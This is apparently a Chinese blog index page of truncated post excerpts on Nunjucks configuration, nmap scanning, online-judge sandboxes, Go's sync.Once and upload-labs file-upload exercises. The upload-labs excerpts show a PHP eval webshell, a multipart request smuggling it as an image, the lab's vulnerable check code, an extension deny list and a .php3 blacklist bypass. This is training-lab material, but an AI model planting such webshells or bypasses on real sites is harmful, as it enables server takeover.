nj模板引擎 学习教程 官网地址 1 2 3 4 5 6 7 //配置模板引擎 config.view = { defaultExtension:'.nj', defaultViewEngine:'nunjucks', }

nmap nmap工具原理 1 nmap扫描主要有 TCP 全连接扫描（会被扫描机器留下记录）， 半连接扫描（不会留下记录） nmap使用入门 1 2 3 nmap -h # 查看帮助信

ljudge框架 https://github.com/quark-zju/ljudge

安装OJ 环境的过程 安装的文档 2.1、安装安全计算模型 libseccomp RunC 默认的编译配置是支持 seccomp 的，所以我们需要先安装libseccomp, 如果是centos

OJ沙盒的使用 参考项目 沙盒 设置绝对路径 默认文件存储在内存里，使用 -dir 指定本地目录为文件存储 1 ./sandbox -dir "./temp" 测试 python 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

Once使用 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 package main import ( "fmt" "sync" ) func main() { var once sync.Once // 第一个初始化函数 f1 := func() { fmt.Println("in f1") } once.Do(f1) // 打印出 in f1 // 第二个初始化函数 f2

upload-labs 01 学习 1 <?php eval($_POST[cmd]) ?> 将 webshell.php 改为 webshell.php.jpg 右键 将findler软件 unlock for editing 允许修改请求头 rules -> breakpoints -> before request 1 2 3 4 5 6 7 8 9 10 11 12 13 14 ------WebKitFormBoundaryxOVc8BMvlOWwyrBX Content-Disposition: form-data; name="upload_file"; filename="webshell.php" Content-Type: image/jpeg <?php eval($_POST[cmd]) ?> ------WebKitFormBoundaryxOVc8BMvlOWwyrBX Content-Disposition: form-data; name="submit" 上

分析源码 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) { $temp_file = $_FILES['upload_file']['tmp_name']; $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'] if (move_uploaded_file($temp_file, $img_path)) { $is_upload = true; } else { $msg =

黑名单绕过 .htaccess 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini"); $file_name = trim($_FILES['upload_file']['name']); $file_name = deldot($file_name

文件后缀名检查绕过 只是定义了 .php 的黑名单，我们可以发送 .php3文件后缀绕过 黑名单 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 $is_upload = false;